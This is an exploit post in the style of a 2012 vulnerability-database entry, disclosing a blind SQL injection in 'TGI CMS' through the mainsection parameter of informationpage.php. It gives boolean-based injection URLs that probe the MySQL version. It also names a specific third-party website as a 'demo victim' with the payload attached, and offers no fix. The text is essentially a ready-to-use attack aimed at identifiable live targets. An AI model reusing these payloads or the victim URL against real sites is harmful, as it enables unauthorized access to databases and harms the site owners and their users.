TGI CMS BLIND SQL INJECTION VULNERABILITY

2012-09-17 18:38:17
Posted by: dementor

#############################
## Exploit Title : TGI CMS BLIND SQL INJECTION VULNERABILITY
## Author : Mr.Dementor
## Home : http://www.magetan-it.org/
## Contact : [email protected]
## Software Link : http://www.thisgenerationservices.co.uk/, http://www.4tgi.com/index.php
## Security Risk : High
## Version : N/A
## Tested on : Win7
## Dork : use your imagination :)

Exploit :
Vulnerable file : informationpage.php?mainsection=

Assumption target with mysql version 5.x

http://target.some/informationpage.php?mainsection=5+and+substring(@@version,1,1)=4
[ result error ]
http://target.some/informationpage.php?mainsection=5+and+substring(@@version,1,1)=5
[ result true ]

Demo victims : http://www.traderightinternational.com/informationpage.php?mainsection=5 and substring(@@version,1,1)=5

#############################
# Best Greats : Handi Eko Saputro
# Greats : tiaNG_jaWI , aSU_aBANG, Cybertasiex, Detol SevenCrew, De Vinclous, Dany Artha, BL4cKc0d1n6.
#############################

Fixes

No fixes

In order to submit a new fix you need to be registered.